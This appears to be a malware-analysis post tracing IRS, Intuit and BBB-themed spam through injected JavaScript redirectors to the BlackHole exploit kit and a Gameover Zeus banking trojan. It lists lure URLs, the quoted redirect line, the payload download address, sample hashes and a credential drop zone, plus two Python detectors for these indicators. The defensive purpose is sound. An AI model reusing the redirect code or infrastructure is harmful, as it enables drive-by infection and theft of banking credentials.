IRS-Intuit-BBB themed spams -to- BlackHole -to- Gameover Zeus

Subject: IRS notification of your tax appeal status.
URL: hxxp://pedrasecompanhia.com.br/KdiK8scE/index.html

IRS notification of your tax appeal status

Subject: Rejection of your tax appeal.
URL: hxxp://entertain4you.com/iWYE2wes/index.html

Rejection of your tax appeal

Subject: Your tax return appeal is declined
URLs: hxxp://pedrasecompanhia.com.br/iWYE2wes/index.html

Your tax return appeal is declined

Subject: Your Intuit.com software order.
URLs: hxxp://panacea-retail.com/N192yy6H/index.html
hxxp://mondistar.ro/fUjtMi6v/index.html
hxxp://panacea-retail.com/N192yy6H/index.html

Your Intuit.com software order

Subject: Your intuit.com order.
URLs: hxxp://pinter.rsia-andini.com/KdiK8scE/index.html
hxxp://pinter.rsia-andini.com/Q8dvz6Dw/index.html
hxxp://mainfar.zxq.net/fUjtMi6v/index.html

Your intuit.com order

Subject: Re: your customers complaint ID 50606977.
URLs: hxxp://almeidadohrn.com/wp-includes/opek.html

Re: your customers complaint ID 50606977

Subject: Your company Better Business Bureau complaint.
URLs: hxxp://thearabmatch.com/8ViaUCMr/index.html
hxxp://mirsatmurutoglu.freehosting.com/TcS203Fn/index.html
hxxp://mondistar.ro/N192yy6H/index.html

Your company Better Business Bureau complaint

Subject: BBB processing RE: Case ID 33614330
URLs: hxxp://michael-ngo.com/wp-includes/opek.html

BBB processing RE: Case ID 33614330

Subject: BBB case ID 35908630
URLs: hxxp://womens-issues.medicalbillingclassesonline.info/wp-includes/opek.html

BBB case ID 35908630

Subject: Your business is accused of illegal activities.
URLs: hxxp://travianx10.host.org/FMG8bqfk/index.html
hxxp://southernmagnetics.com/FMG8bqfk/index.html
hxxp://pedrasecompanhia.com.br/h2gVqD1Q/index.html
hxxp://impresilk.com.br/8ViaUCMr/index.html

Your business is accused of illegal activities.

These JavaScript redirectors all carry the same document.location script. It sends the victim to a BlackHole Exploit Kit landing page (the kit is listed at 207.210.65.102, while the captured redirect below points at 173.224.71.132:8080):

document.location='hxxp://173.224.71.132:8080/showthread.php?t=d44175c6da768b70';

The exploit kit then downloads the Gameover Zeus installer from:

hxxp://173.224.71.132:8080/q.php?f=e0c3a&e=2
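Triage of a captured landing page comes down to pulling the document.location target out of the HTML and checking it against the two BlackHole paths seen in this campaign: the /showthread.php?t=<16 hex> landing page and the /q.php?f=...&e=... payload download, both served from a bare IP. The script below is an added example and not code from the original post; the HTML around the redirect and the benign comparison page are constructed, and the sample keeps a live-looking http:// scheme so that urlparse works, with defanging applied only when printing.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample of a redirector page of the kind described above (the target host,
# port and thread id are the ones quoted in the post; the surrounding HTML is made up).
SAMPLE_REDIRECTOR = """<html><body>
<script type="text/javascript">
document.location='http://173.224.71.132:8080/showthread.php?t=d44175c6da768b70';
</script>
</body></html>"""

# Constructed benign page: also uses document.location, must not be flagged.
BENIGN_REDIRECT = """<script>document.location="https://www.example.com/login";</script>"""

# Any document.location assignment whose target is a quoted string literal.
REDIRECT_RE = re.compile(
    r"""document\.location\s*=\s*(?P<q>['"])(?P<url>.+?)(?P=q)""", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
HEX16_RE = re.compile(r"^[0-9a-f]{16}$")


def defang(url):
    """Neutralise a URL for reports, using the same hxxp convention as the post."""
    return "hxxp" + url[4:] if url.lower().startswith("http") else url


def classify(url):
    """Match a URL against the two BlackHole paths seen in this campaign.

    Returns (kind, host, port, key): kind is 'landing' for /showthread.php?t=<16 hex>
    (key is the thread id) or 'payload' for /q.php?f=...&e=... (key is the f value).
    Returns None for anything else. Both kinds were served from a bare IP address,
    so a URL with a hostname never matches.
    """
    p = urlparse(url)
    host = p.hostname or ""
    if not IPV4_RE.match(host):
        return None
    q = parse_qs(p.query)
    port = p.port or 80
    if p.path == "/showthread.php":
        t = q.get("t", [""])[0]
        if HEX16_RE.match(t):
            return ("landing", host, port, t)
    elif p.path == "/q.php" and "f" in q and "e" in q:
        return ("payload", host, port, q["f"][0])
    return None


def scan_html(html):
    """Extract every document.location target from a page and keep the BlackHole hits."""
    hits = []
    for m in REDIRECT_RE.finditer(html):
        c = classify(m.group("url"))
        if c:
            hits.append(c)
    return hits


def scan_urls(urls):
    """Same classification over a list of URLs, e.g. pulled from a proxy log."""
    return [c for c in (classify(u) for u in urls) if c]


if __name__ == "__main__":
    for kind, host, port, key in scan_html(SAMPLE_REDIRECTOR):
        print(kind, defang(f"http://{host}:{port}"), key)
    print(scan_urls(["http://173.224.71.132:8080/q.php?f=e0c3a&e=2"]))
```

The path checks are deliberately exact rather than substring matches: /showthread.php is a common forum path, and only the combination of a bare IP, that path and a 16-hex-digit thread id is specific to this kit.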

File: calc.exe
MD5: 0599eb89a5ca8ea3b7c887e3940d1a33
Size: 286,703 bytes

This Gameover installer is detected by 3 of 43 AV vendors on VirusTotal. It then drops the Zeus bot into %APPDATA% with the following properties:

File: ycegv.exe
MD5: e34904d4dbd79ee5ac9148adc37534cb
Size: 273,944 bytes
Other: This file is digitally signed by 'aPgdobQNbLOM'
Company Name: Twain Working Group
File Description: Twain.dll Client's 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:07:23 16:34:06+02:00

The version resources copy those of the legitimate Windows Twunk_32.exe, while the signer name is a random string. A signer that does not match the claimed company is an easy triage signal for samples like this one.

This Gameover variant is detected by 7 of 43 AV vendors on VirusTotal. It had a bot id of "ppcz14" and a cid of "3004", and posted online banking credentials stolen from victims to a drop zone at 87.97.164.223 over port 22005.
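The network indicators in this post (the landing/payload host, the exploit kit address, the drop zone and its port) are enough to sweep firewall or proxy logs for already-infected machines. The detector below is an added example, not part of the original post: the indicator values are the ones quoted above, but the key=value log format and the log lines themselves are constructed. It applies two rules, a host match at high severity and a port-only match on 22005 at medium severity, so that a drop zone that has moved to a new address is not missed.

```python
import re
from collections import namedtuple

# Indicators taken from the post above.
IOC_HOSTS = {
    "173.224.71.132": "BlackHole landing page / Gameover installer host",
    "207.210.65.102": "BlackHole Exploit Kit",
    "87.97.164.223": "Gameover Zeus credential drop zone",
}
DROP_ZONE_PORT = 22005
IOC_MD5 = {
    "0599eb89a5ca8ea3b7c887e3940d1a33": "calc.exe (Gameover Zeus installer)",
    "e34904d4dbd79ee5ac9148adc37534cb": "ycegv.exe (Gameover Zeus bot, %APPDATA%)",
}

# Constructed firewall log lines; the key=value format is an assumption, not from the post.
SAMPLE_LOG = """\
2012-05-22T10:01:02Z action=allow src=10.1.1.23 dst=173.224.71.132 dport=8080 proto=tcp
2012-05-22T10:01:09Z action=allow src=10.1.1.23 dst=87.97.164.223 dport=22005 proto=tcp
2012-05-22T10:02:15Z action=allow src=10.1.1.40 dst=93.184.216.34 dport=443 proto=tcp
2012-05-22T10:03:00Z action=allow src=10.1.1.57 dst=198.51.100.7 dport=22005 proto=tcp
2012-05-22T10:03:31Z action=deny src=10.1.1.57 dst=87.97.164.223 dport=22005 proto=tcp
garbage line that must be skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) action=(?P<action>\w+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) proto=(?P<proto>\w+)$")

Alert = namedtuple("Alert", "ts src dst dport severity reason")


def detect(log_text):
    """Return one Alert per log line that matches the campaign's network indicators.

    Rule 1: any traffic to a known host is high severity, whatever the port.
    Rule 2: traffic to the drop-zone port 22005 on an unknown host is medium
    severity, so a drop zone at a new address still surfaces for triage.
    Denied connections still alert: the attempt itself means an infected host.
    """
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line, skip rather than crash the sweep
        dst, dport = m["dst"], int(m["dport"])
        if dst in IOC_HOSTS:
            alerts.append(Alert(m["ts"], m["src"], dst, dport, "high", IOC_HOSTS[dst]))
        elif dport == DROP_ZONE_PORT:
            alerts.append(Alert(m["ts"], m["src"], dst, dport, "medium",
                                "outbound to Gameover drop-zone port, unknown host"))
    return alerts


def infected_hosts(alerts):
    """Internal sources with at least one high-severity hit, for containment."""
    return sorted({a.src for a in alerts if a.severity == "high"})


def lookup_hash(md5):
    """Map a file hash (any case) to the sample it belongs to, or None."""
    return IOC_MD5.get(md5.strip().lower())


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for a in found:
        print(a.severity, a.src, "->", f"{a.dst}:{a.dport}", a.reason)
    print("contain:", infected_hosts(found))
```

The medium-severity port rule will produce some noise on networks that use port 22005 legitimately; the point is that it is the one indicator here that survives the drop zone changing IP, so it is worth keeping with a lower priority rather than dropping.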
